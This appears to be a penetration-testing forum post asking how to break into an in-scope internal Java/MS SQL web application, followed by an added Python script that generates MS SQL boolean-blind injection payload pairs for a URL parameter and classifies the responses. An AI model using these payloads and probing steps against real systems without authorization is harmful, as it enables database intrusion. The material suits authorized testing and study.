Help popping a web application


Working on a Black Box application test and I am looking for a little
input on some things to try to get through this application. This is
against production deployed code but the test is against the test lab
systems so messing up the system is ok. The goal is elevated privilege
and/or data manipulation. What I am up against is a 3 tier web

Rules/scope are application only, no direct service attacks against
the OS, network, or server system (IIS 5) itself. So no Metasploit-type
garbage. Hand jamming all the way, and through the web interface


Web tier: web server is IIS 5.0 on Windows 2000
Application server tier: application server is WebSphere 6.0 on Windows 2000
DB tier: MS SQL on Windows 2000.

All separate boxes. Code base is Java. Authentication is handled by
Active Directory (out of scope). This is an internal app. There are
probably firewalls between me and the primary web server, but my area
is application only anyway. I have a user level login. Whole
connection scheme is SSL (cookies/presentation/ all of it).

WebInspect offered NO vulnerabilities.

What I have done, both in the HTML portion of the application and by
catching the info at a Burp Suite proxy so I could bypass any funky

Standard 1=1 and ' type injections at multiple input locations.
Produced no errors just a custom "did not meet criteria message".

Directory traversal – no joy

URL rewrite for bypassing any login type criteria- no joy

Sequential session ID checks to hijack a one-up system – no joy, they are random

Large input (5000 characters) to see if I could force an error.

Bad option to a field sort request – got a custom error message
stating call the administrator. No information

No information in the HTML code. Column headings do not appear to
match DB tables when other requests are manipulated with HTML

Cookies and web pages are not cached.

There was other stuff but I am a little drained to remember right now.
I have until Sunday to pop this then my window closes.

Anything can help at this point. I hate to lose.
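One thing worth doing with the injection results above: a custom "did not meet criteria" page means database errors are being masked, so error-based probing ("' " and "1=1" alone) tells you nothing either way. The usable signal is boolean-based blind testing, where a payload pair whose only difference is a TRUE versus FALSE condition is sent to the same input and the two responses are compared after stripping volatile content (session IDs, timestamps). The script below is an added example, not code from the original post; the helper names (`probe_pairs`, `classify`) and the HTML responses are constructed for illustration, and the payload list assumes MS SQL Server syntax as stated in the post.

```python
"""
Boolean-based blind SQL injection differencing (added example).

Assumes the target masks DB errors behind a generic page, so the only
signal is: TRUE-condition response ~ baseline, FALSE-condition response
differs from both.  Nothing here contacts a server; the HTML samples
are constructed to show the three outcomes the comparator distinguishes.
"""
import difflib
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# (true_condition, false_condition) pairs for MS SQL Server:
# string context with comment terminator, string context without it
# (for cases where the trailing quote is re-appended), numeric context.
PAYLOAD_PAIRS = [
    ("' AND 1=1--", "' AND 1=2--"),
    ("' AND 'a'='a", "' AND 'a'='b"),
    (" AND 1=1", " AND 1=2"),
]

# Volatile fragments that differ between otherwise identical responses.
VOLATILE = [
    (re.compile(r"JSESSIONID=[A-Za-z0-9:.\-]+"), "JSESSIONID=X"),
    (re.compile(r"\b\d{1,2}:\d{2}:\d{2}\b"), "HH:MM:SS"),
    (re.compile(r"\b\d{4}-\d{2}-\d{2}\b"), "YYYY-MM-DD"),
    (re.compile(r"\s+"), " "),
]


def normalize(body: str) -> str:
    """Replace session IDs, clock values and whitespace runs so two
    responses compare on content rather than on per-request noise."""
    for pattern, repl in VOLATILE:
        body = pattern.sub(repl, body)
    return body.strip()


def similarity(a: str, b: str) -> float:
    """Ratio in [0, 1]; 1.0 means identical after normalisation."""
    return difflib.SequenceMatcher(None, normalize(a), normalize(b)).ratio()


def classify(baseline: str, true_resp: str, false_resp: str,
             threshold: float = 0.95) -> str:
    """Interpret one TRUE/FALSE probe pair against the untampered baseline.

    boolean-blind : TRUE looks like baseline, FALSE does not -> the
                    condition reached the query and changed its result.
    both-rejected : TRUE and FALSE both differ from baseline but match
                    each other (same custom error page) -> input was
                    rejected or parameterised; no inference possible.
    no-signal     : anything else (e.g. all three identical).
    """
    sim_true = similarity(baseline, true_resp)
    sim_false = similarity(baseline, false_resp)
    sim_tf = similarity(true_resp, false_resp)
    if sim_true >= threshold and sim_false < threshold:
        return "boolean-blind"
    if sim_true < threshold and sim_false < threshold and sim_tf >= threshold:
        return "both-rejected"
    return "no-signal"


def probe_pairs(url: str, param: str) -> list:
    """Return (true_url, false_url) tuples with each payload pair appended
    to the given query parameter; every other parameter is kept as-is."""
    parts = urlsplit(url)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    base_value = query.get(param, "")
    out = []
    for t, f in PAYLOAD_PAIRS:
        pair = []
        for payload in (t, f):
            q = dict(query)
            q[param] = base_value + payload
            pair.append(urlunsplit(parts._replace(query=urlencode(q))))
        out.append(tuple(pair))
    return out


# Constructed sample responses (not captured from any real system).
BASELINE = ("<html><body>Session JSESSIONID=0000A1:abc Time 10:15:02"
            "<table><tr><td>ACME Corp</td><td>Open</td></tr></table>"
            "</body></html>")
TRUE_RESP = BASELINE.replace("0000A1:abc", "0000B7:xyz").replace("10:15:02", "10:15:09")
FALSE_RESP = ("<html><body>Session JSESSIONID=0000C2:qrs Time 10:15:11"
              "<p>No records found</p></body></html>")
ERROR_RESP = ("<html><body>Session JSESSIONID=0000D9:lmn Time 10:15:14"
              "<p>Input did not meet criteria</p></body></html>")

if __name__ == "__main__":
    for t_url, f_url in probe_pairs("https://app.example/report?sort=name&page=1", "sort"):
        print(t_url, "|", f_url)
    print(classify(BASELINE, TRUE_RESP, FALSE_RESP))   # boolean-blind
    print(classify(BASELINE, ERROR_RESP, ERROR_RESP))  # both-rejected
```

Feed `classify` with live responses for each pair from `probe_pairs` (the untampered request as baseline). A "both-rejected" result for every pair is consistent with the validation message described above, but it only shows the payloads were rejected, not that the query is parameterised; the same pairs should still be tried as POST bodies, cookies and header values, since the custom error handler may not cover every input path.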

